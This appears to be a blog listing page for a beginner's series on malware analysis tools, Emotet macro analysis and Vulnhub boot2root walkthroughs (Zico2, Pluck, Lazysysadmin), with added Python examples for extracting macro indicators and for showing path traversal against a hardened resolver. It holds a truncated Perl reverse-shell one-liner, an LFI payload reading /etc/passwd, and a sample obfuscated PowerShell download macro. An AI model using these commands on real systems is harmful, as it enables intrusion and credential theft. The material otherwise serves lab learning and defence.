
0xbc’s Basic Malware Analysis Blog Series

I have recently been doing some reverse engineering and malware analysis at work. Being a newbie, I decided to record some of the process on HackMD, in roughly seven topics. I hope it helps other beginners in this area like me; questions are welcome in the comments. Table of contents: https://hackmd.io/@0xbc000/H1Z9yJcmw I am still a rookie, so please bear with me 😛 -0xbc

Malware Analysis - Common Tools

Introduction
Because of work I have recently been getting into a bit of malware and reverse engineering, so I am recording the tools I use most and what they are for, in case I forget later.... I hope to update this from time to time.

This post is divided into four parts: execution environment, static analysis, dynamic analysis, and finally the quick summary.

Execution environment
The most common choice is Windows. I personally prefer Windows 7 64-bit: it is widespread and you can install a lot on it, and most malware is written for Windows anyway.
Another very useful environment is REMnux, which comes preloaded with many of the tools mentioned below. See https://remnux.org/ and the official documentation at https://docs.remnux.org/

Static analysis
As the name suggests, you do not want to run the malware but still want to look at what is inside. For Windows samples the following tools can be used:
PE Studio - needs separate installation. Does initial triage and also shows whether anti-debug/anti-analysis tricks are standing in the way.
IDA - the standard reversing tool; shows the assembly and also has a debugger.
Ghidra
PE Bear / PE View - for digging into the PE file format.
oledump.py - analyzes the macros inside Office formats (Word, Excel).
pdf-parser.py - analyzes the objects inside PDF files.

Dynamic analysis
After static analysis, to verify your hypotheses you can move on to dynamic analysis. There are many approaches, but they broadly split into automated and manual. I am lazy, so I mostly use automated analysis.
Cuckoo - the standard sandbox; the reports are very complete, but occasionally it gets caught by anti-debug/anti-analysis tricks and the sample simply refuses to run.
ANY.RUN - the easiest route is to throw the sample into a sandbox like Cuckoo, but I recently found this very useful and free service, which lets you interact directly with the Windows VM inside the sandbox. The only drawback is that it only supports Windows.
To the reversing gods who disdain sandboxes, I bow to you first........
If you prefer doing it manually, there are also tools to recommend:
Process Hacker - a souped-up Task Manager; shows every running process and its details (mutexes, process handles.....). Watching it while the sample runs usually makes the signs of process injection easy to spot.
Process Monitor - records all system activity (file, registry, process and network operations), but it is best paired with a visualization tool such as ProcDOT to make the log readable, or at least use the built-in

Netwalker malware deobfuscation - From PowerShell to EXE


Emotet word document malware analysis

I have recently started learning some reverse engineering techniques. This post covers the analysis of the Word document; the next one will analyze the exe file embedded in it. Reversing Emotet-1. The main idea is to find the section of the file that carries the macro, then look for suspicious strings: powershell, IP addresses, URLs, file names. The environment is REMnux, download from here. The tool is oledump.py, which is already built into REMnux. I am new to analysis, so please bear with me :P -0xbc
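The "look for suspicious strings" step above is where macro droppers fight back: the keyword is rarely present as one literal, but split across `"pow" & "ersh" & Chr(101) & "ll"` pieces so a plain grep over the `oledump.py -s N -v` output misses it. The following is an added example (not code from the original post, and the VBA sample in it is constructed for illustration, not the Emotet macro the post analyzes). It normalizes VBA string building, then extracts the indicator classes the post lists, plus auto-exec entry points and shell calls as extra triage signals.

```python
import re

# Constructed sample of obfuscated VBA (made up for this example): the
# PowerShell command and download URL are split with '&' concatenation and Chr().
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim c As String
    c = "pow" & "ersh" & Chr(101) & "ll -w hidden -e" & " SQBFAFgA"
    u = "ht" & "tp://" & "203.0.113.45" & "/inv" & "oice" & ".exe"
    Shell c & " " & u, vbHide
End Sub
'''

CHR_RE = re.compile(r'Chr[WB]?\((\d+)\)', re.IGNORECASE)   # Chr(n), ChrW(n), ChrB(n)
CONCAT_RE = re.compile(r'"\s*&\s*"')                        # "a" & "b"  ->  "ab"


def normalize_vba(src):
    """Resolve Chr(n) calls to quoted literals, then collapse adjacent string
    concatenations until the text stops changing, so split keywords become
    readable. Only decimal Chr() arguments are handled here."""
    def chr_repl(m):
        ch = chr(int(m.group(1)))
        if ch == '"':
            return '""""'          # VBA escapes a quote inside a string as ""
        return '"%s"' % ch
    out = CHR_RE.sub(chr_repl, src)
    prev = None
    while prev != out:
        prev = out
        out = CONCAT_RE.sub('', out)
    return out


# Indicator classes: the post's list (powershell, IP, URL, file name) plus two
# cheap extra signals that tell you the macro runs on open and spawns a process.
IOC_PATTERNS = {
    'powershell': re.compile(r'powershell[^"\n]*', re.IGNORECASE),
    'url': re.compile(r'https?://[^\s"\'<>]+', re.IGNORECASE),
    'ip': re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b'),
    'filename': re.compile(r'[\w-]+\.(?:exe|dll|ps1|vbs|bat)\b', re.IGNORECASE),
    'autoexec': re.compile(r'\b(?:AutoOpen|Document_Open|AutoExec|Workbook_Open)\b'),
    'shell': re.compile(r'\b(?:Shell|WScript\.Shell|CreateObject)\b', re.IGNORECASE),
}


def extract_iocs(src):
    """Normalize the macro source, then return {indicator_class: sorted hits}
    for every class that matched at least once."""
    norm = normalize_vba(src)
    found = {}
    for name, pat in IOC_PATTERNS.items():
        hits = sorted(set(pat.findall(norm)))
        if hits:
            found[name] = hits
    return found


if __name__ == '__main__':
    for cls, hits in extract_iocs(SAMPLE_VBA).items():
        print(f'{cls:11} {hits}')
```

Feed it the decompressed VBA text that oledump.py prints for a macro stream; the normalization is deliberately conservative (it does not evaluate StrReverse, Replace or arithmetic on Chr arguments), so treat an empty result as "obfuscation not handled", not as "clean".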

Vulnhub Zico2: 1 Walkthrough

This article is a walkthrough of the Zico2 machine from Vulnhub. The VM can be downloaded from here: https://www.vulnhub.com/entry/zico2-1,210/ As a shortcut, the methods I used: LFI, operating-system exploit. Let's start: As always, begin by finding the machine's IP; mine is 172.16.194.203. An nmap scan finds ports 22, 80 and 111 open. A dirb scan found an interesting dbadmin folder; browsing to it reveals a PHP login, and the password is "admin". After logging in, the version shown is phpLiteAdmin 1.9.3. phpLiteAdmin 1.9.3 is vulnerable to remote code execution: https://www.exploit-db.com/exploits/24044/ Using the RCE, I can for example execute "locate nc" on the victim machine. Exploit: After some trial and error, I found I could use a perl reverse shell. To find other kinds of reverse shell: locate perl at /usr/bin/perl, then run /usr/bin/perl -h, which gives feedback. /usr/bin/perl -e 'use Socket;$i="172.16.194.142";$p=1234;socket(

Vulnhub Pluck 1 Walk Through

This article is a walkthrough for the Pluck 1 boot2root machine, which can be downloaded from Vulnhub: https://www.vulnhub.com/entry/pluck-1,178/ As a shortcut, the exploit knowledge I used on this machine: LFI, shell escape, SUID exploit. Let's start. First, as always, find the address with netdiscover or arp-scan (-r is the 'range' option). Information gathering: after finding the address, use nmap to scan which ports are open; we get 22, 80 and 3306. Start with HTTP: we see a page with some options along the top. When I browse to the About option, it loads a file through the URL parameter page=about.php. That could be LFI if the input is not sanitized, so next I try page=../../../../../etc/passwd. Bingo! We get the passwd file, and on the bottom line there is an interesting user named backup with a script file. Use the LFI again to see what is inside this file; the content is: we can get in via tftp and in the file /back
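The page=../../../../../etc/passwd step above (and the LFI listed for Zico2) comes down to one thing: the application joins attacker-controlled input onto a base directory and never checks where the result ends up. The following is an added example, not code from the original walkthroughs or from the Pluck VM; the document root /var/www/html and the page allowlist are assumptions for the illustration. It shows where the naive include lands for the post's payload and two variants, and how an allowlist plus a containment check rejects all of them.

```python
import posixpath

# Assumed layout for the illustration; the real VM's paths are not shown on the page.
WEB_ROOT = '/var/www/html'
ALLOWED_PAGES = {'index.php', 'about.php', 'contact.php'}


def resolve_vulnerable(page):
    """What include($_GET['page']) effectively does when the value is not
    validated: join it onto the document root and honour every '..'.
    posixpath.join also discards WEB_ROOT entirely when page is absolute."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, page))


def is_inside_root(path):
    """Containment test on an already-normalized path: it must be WEB_ROOT
    itself or live strictly below it."""
    return path == WEB_ROOT or path.startswith(WEB_ROOT + '/')


def resolve_hardened(page):
    """Allowlist first (the real fix), then containment as defence in depth.
    Returns None when the request must be rejected."""
    name = posixpath.basename(page)          # drop any directory component
    if name not in ALLOWED_PAGES:
        return None
    full = resolve_vulnerable(name)
    if not is_inside_root(full):
        return None
    return full


def traversal_report(payloads):
    """For each payload: (payload, where the naive include lands,
    whether that is still under WEB_ROOT, what the hardened resolver returns)."""
    rows = []
    for p in payloads:
        naive = resolve_vulnerable(p)
        rows.append((p, naive, is_inside_root(naive), resolve_hardened(p)))
    return rows


if __name__ == '__main__':
    # The post's payload plus an absolute path and a "valid prefix" variant.
    payloads = [
        'about.php',
        '../../../../../etc/passwd',
        '/etc/passwd',
        'about.php/../../../../../../etc/passwd',
    ]
    for p, naive, inside, hardened in traversal_report(payloads):
        print(f'{p:42} naive->{naive:26} inside_root={inside!s:5} hardened->{hardened}')
```

Note that five `..` from a three-level document root still resolve to /etc/passwd: normalization stops at `/`, so extra `..` segments cost the attacker nothing, which is why walkthroughs pile them on. A string-based containment check like the one here is only as good as the normalization before it; on a real filesystem resolve symlinks first (os.path.realpath) before comparing.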

Vulnhub Lazysysadmin walk through

This is a writeup for the Vulnhub machine Lazysysadmin. The machine can be downloaded from here: https://www.vulnhub.com/entry/lazysysadmin-1,205/ The target IP is 172.16.194.199. Next, run an nmap scan: ports 22, 80, 139, 445, 3306 and 6667 are open. I start with the HTTP scan and find WordPress and phpMyAdmin, which looks really interesting! Try to dig further with wpscan and look at the site: there is "My name is togie", which looks interesting, maybe the system username or something else. Run wpscan, then try some default credentials on the WordPress login, but they do not work... After I cannot dig up anything more, I turn to the Samba service. Next, try to access the server with smbclient: Great! We can access it without any password, and there is a file named deets.txt; open it in the browser and we get: Try again on WordPress, but it does not work. The next file is wp-config.php, the WordPress configuration that holds the database credentials. After getting the file, open it and